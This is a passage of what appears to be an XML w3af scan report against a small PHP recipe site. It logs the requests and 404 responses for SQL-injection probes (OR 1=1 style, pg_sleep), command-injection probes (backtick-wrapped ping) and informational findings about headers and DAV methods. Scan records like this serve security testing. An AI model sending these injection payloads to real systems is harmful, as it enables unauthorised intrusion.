&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="468">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+AND+%2229%22%3D%2230 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 29%22+AND+%2229%22%3D%2230 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='29%22+AND+%2229%22%3D%2230'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="847">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+pg_sleep%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+pg_sleep%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="479">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%27+OR+%2770%27%3D%2770 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%27+OR+%2770%27%3D%2770 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%27+OR+%2770%27%3D%2770'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="489">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%27+AND+%2770%27%3D%2771 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%27+AND+%2770%27%3D%2771 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%27+AND+%2770%27%3D%2771'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="850">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about run+ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='run+ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="765">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/75+OR+75%3D75+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 75+OR+75%3D75+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='75+OR+75%3D75+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="504">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="818">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-n+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-n+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="509">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[66]" method="GET" name="Omitted server header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response.</description>
        <http-transactions>
            <http-transaction id="66">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[88]" method="GET" name="Powered-by header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;.</description>
        <http-transactions>
            <http-transaction id="88">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[34, 61, 73, 90, 211, 239, 255, 325, 378, 411, 422, 461, 480, 493, 503, 559, 568, 580, 601, 638, 653, 663, 684, 714, 728]" method="GET" name="DAV methods enabled" plugin="allowed_methods" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The URL &quot;http://10.12.68.43:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE.</description>
        <http-transactions>
            <http-transaction id="34">
                <httprequest>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="61">
                <httprequest>
                    <status>MKCOL http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="73">
                <httprequest>
                    <status>MOVE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="90">
                <httprequest>
                    <status>HEAD http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </httpresponse>
            </http-transaction>
            <http-transaction id="211">
                <httprequest>
                    <status>REPORT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="239">
                <httprequest>
                    <status>NOTIFY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="255">
                <httprequest>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="325">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="422">
                <httprequest>
                    <status>CHECKOUT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="461">
                <httprequest>
                    <status>PROPFIND http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="480">
                <httprequest>
                    <status>SUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="493">
                <httprequest>
                    <status>LOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="503">
                <httprequest>
                    <status>MKDIR http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="568">
                <httprequest>
                    <status>MERGE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="580">
                <httprequest>
                    <status>UNLOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="601">
                <httprequest>
                    <status>PROPPATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="638">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="653">
                <httprequest>
                    <status>COPY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

